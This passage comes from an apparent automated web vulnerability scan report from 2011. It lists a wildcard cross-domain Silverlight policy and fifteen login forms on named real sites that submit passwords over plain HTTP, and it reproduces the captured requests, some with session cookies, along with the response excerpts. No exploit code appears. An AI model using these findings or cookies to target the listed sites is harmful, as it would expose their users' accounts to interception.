<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

8.5. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 13:07:06 GMT
Expires: Tue, 26 Apr 2011 13:07:06 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 6181

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

9. Cleartext submission of password previous next
There are 15 instances of this issue:

http://demo.kayako.com/supportsuite/index.php
http://direct.yandex.ru/
http://direct.yandex.ru/pages/direct/_direct-1303387947.js
http://mail.ru/
http://my.webalta.ru/public/engine/templates.js
http://my.webalta.ru/public/engine/templates.js
http://odnoklassniki.ru/
http://pda.loveplanet.ru/
http://pretty.ru/
http://support.trust-guard.com/
http://support.trust-guard.com/index.php
http://vkontakte.ru/
http://www.integritydefender.com/account.php
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
http://www.ripoffreport.com/LoginPage.aspx

9.1. http://demo.kayako.com/supportsuite/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://demo.kayako.com
Path:	/supportsuite/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://demo.kayako.com/supportsuite/index.php

The form contains the following password field:

loginpassword

Request

GET /supportsuite/index.php HTTP/1.1
Host: demo.kayako.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: SWIFT_sessionid40=3vh1b62n3zhh17dlhrf909i97f5q3akv; path=/
Connection: close
Content-Type: text/html
Content-Length: 16066

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://demo.kayako.com/supportsuite/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...

9.2. http://direct.yandex.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://passport.yandex.ru/passport?mode=auth&from=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl

The form contains the following password field:

passwd

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;from=direct&amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>
<input name="login"/>
<input name="passwd" type="password"/>
<input name="twoweeks" type="checkbox" value="yes"/>
...[SNIP]...

9.3. http://direct.yandex.ru/pages/direct/_direct-1303387947.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js

The form contains the following password field:

passwd

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...

9.4. http://mail.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mail.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://e.mail.ru/cgi-bin/auth

The form contains the following password field:

Password

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<div class="relative z100 m">
<form name="Auth" method="post" action="http://e.mail.ru/cgi-bin/auth" style="overflow: hidden;">

<img src="http://limg.imgsmail.ru/mail/ru/images/log_bms.gif" width="226" height="18" usemap="#logbms" alt="" />
...[SNIP]...
<td><input type="password" class="long" size="15" name="Password" tabindex="5"
value="" /></td>
...[SNIP]...

9.5. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password field:

pass

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

9.6. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password fields:

pass
pass2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

9.7. http://odnoklassniki.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=6956

The form contains the following password field:

st.password

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
</label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox">
...[SNIP]...

9.8. http://pda.loveplanet.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://pda.loveplanet.ru/a-logon/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<div class="bl_login bg_lightgray">
<form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<nobr>............ <input type="password" class="itxt" size="5" name="password" id="password"></nobr>
...[SNIP]...

9.9. http://pretty.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://pretty.ru/a-logon/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<td>
        <form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<input type="text" name="auid" id="auid" size="10">
            ............ <input type="password" size="10" name="password" id="password">
            <input type="submit" value=".........." class="button">
...[SNIP]...

9.10. http://support.trust-guard.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.trust-guard.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://support.trust-guard.com/index.php

The form contains the following password field:

loginpassword

Request

GET / HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:04 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 14128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...

9.11. http://support.trust-guard.com/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.trust-guard.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://support.trust-guard.com/index.php

The form contains the following password field:

loginpassword

Request

GET /index.php?_m=troubleshooter&_a=view HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
Referer: http://support.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:49 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 12475

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...

9.12. http://vkontakte.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vkontakte.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://login.vk.com/?act=login

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
...[SNIP]...
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
...[SNIP]...

9.13. http://www.integritydefender.com/account.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.integritydefender.com
Path:	/account.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.integritydefender.com/action/user-account-action.php

The form contains the following password field:

userPassword

Request

GET /account.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<td valign="top" style="border-right:1px dotted #cccccc;">

<form action="action/user-account-action.php" method="post" name="userAccountLogin" id="userAccountLogin" onsubmit="return validateLogin();" >
<div style="width:370px; padding-left:100px; padding-bottom:10px;">
...[SNIP]...
<td width="214" align="left" valign="middle"><input name="userPassword" type="password" id="userPassword" class="signin-textbox" /></td>
...[SNIP]...

9.14. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://usr.marketgid.com/creative/auth/

The form contains the following password field:

pass

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="menu_body" style="margin-bottom:5px">
<form id="mg-auth-form-1" action="http://usr.marketgid.com/creative/auth/" method="post">
<div>
...[SNIP]...
</div>
<input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this)" onblur="form_change(this)" /><input class="submit-button" type="submit" value="........" tabindex="3" />
...[SNIP]...

9.15. http://www.ripoffreport.com/LoginPage.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ripoffreport.com
Path:	/LoginPage.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ripoffreport.com/LoginPage.aspx

The form contains the following password field:

ctl00$ctl00$cphBodyTemplate$cphLeftMasterReport$Login1$PasswordTextbox

Request

GET /LoginPage.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.2.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
